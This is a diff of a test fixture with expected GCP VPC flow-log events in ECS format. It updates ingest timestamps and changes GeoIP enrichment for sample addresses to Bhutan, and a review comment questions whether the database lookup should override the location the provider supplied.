@@ -3547,7 +3718,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391344Z", + "ingested": "2021-12-14T14:43:27.415190856Z", "original": "{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", @@ -3569,11 +3740,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -3645,7 +3821,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391348500Z", + "ingested": "2021-12-14T14:43:27.415191264Z", "original": "{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", @@ -3661,11 +3837,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33524, 
@@ -3743,7 +3924,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391353Z", + "ingested": "2021-12-14T14:43:27.415191673Z", "original": "{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", @@ -3765,11 +3946,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -3841,7 +4027,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391357100Z", + "ingested": "2021-12-14T14:43:27.415192066Z", "original": "{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", @@ -3863,11 +4049,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33694, 
@@ -3939,7 +4130,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391360500Z", + "ingested": "2021-12-14T14:43:27.415192470Z", "original": "{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", 
@@ -3950,16 +4141,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33924, 
@@ -3973,6 +4199,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415192858Z", + "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:20.634545217Z", + "end": "2019-06-14T03:46:20.745658276Z", + "id": "1ulp77rfdvho4r", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -3984,22 +4220,27 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 89 } }, "source": { 
@@ -4015,30 +4256,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391364700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:20.634545217Z", - "end": "2019-06-14T03:46:20.745658276Z", - "id": "1ulp77rfdvho4r", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65271, 
@@ -4052,6 +4281,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415193246Z", + "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378070Z", + "end": "2019-06-14T03:49:55.318940798Z", + "id": "1ulp77rfdvho4i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -4063,25 +4302,24 @@ "iana_number": "6", "packets": 605, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 89 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -4092,23 +4330,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391369300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378070Z", - "end": "2019-06-14T03:49:55.318940798Z", - "id": "1ulp77rfdvho4i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -4129,6 +4358,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415193638Z", + "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:11.655143526Z", + "end": "2019-06-14T03:46:11.779780615Z", + "id": "1ulp77rfdvho5v", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4140,17 +4379,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -4167,25 +4411,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 219 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391374100Z", - "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:11.655143526Z", - "end": "2019-06-14T03:46:11.779780615Z", - "id": "1ulp77rfdvho5v", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -4194,13 +4423,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65321, 
@@ -4208,6 +4440,16 @@ "ip": "67.43.156.13", "packets": 737 }, + "event": { + "ingested": "2021-12-14T14:43:27.415194027Z", + "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.843986502Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "1ulp77rfdvho5i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -4219,19 +4461,30 @@ "iana_number": "6", "packets": 737, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 86 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -4242,38 +4495,20 @@
 "project_id": "my-sample-project",
 "zone": "us-east1-b"
 }
- },
- "vpcflow": {
- "reporter": "DEST",
- "rtt": {
- "ms": 219
- }
 }
 },
- "event": {
- "ingested": "2021-12-09T13:37:46.391379600Z",
- "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:39:59.843986502Z",
- "end": "2019-06-14T03:49:56.312105537Z",
- "id": "1ulp77rfdvho5i",
- "category": "network",
- "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa",
- "city_name": "Broomfield",
- "region_name": "Colorado"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 33652
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 65316,
@@ -4287,6 +4522,16 @@
 "domain": "elasticsearch",
 "ip": "10.139.99.242"
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415194452Z",
+ "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:40:00.565831992Z",
+ "end": "2019-06-14T03:49:56.220838853Z",
+ "id": "1ulp77rfdvho5c",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
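Review bot: The new expected `destination.geo` for 67.43.156.13 (Asia, Bhutan, AS 35908) no longer agrees with the `src_location`/`dest_location` the log itself reports in `event.original` (Broomfield, Colorado, ASN 33652, country usa), so in this hunk and the later geo hunks for the same address the ingest pipeline's GeoIP lookup appears to take precedence over the provider-supplied location. The pipeline that performs the enrichment is outside this diff, and the Bhutan result is presumably what the test GeoIP database shipped with the updated elastic-package returns for that prefix, so the expectation is now coupled to that fixture rather than to the documented GCP fields. Please confirm in the PR description that dropping the provider location in favour of the database lookup is intended, and if it is not, the pipeline should only fill `source.geo`/`destination.geo` when the log carries no location, e.g. by making the geoip step conditional on the absence of `src_location`/`dest_location`. Either way the changed precedence is worth a line in the changelog so downstream detections keyed on `geo.country_name` are not surprised.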
@@ -4298,46 +4543,6 @@
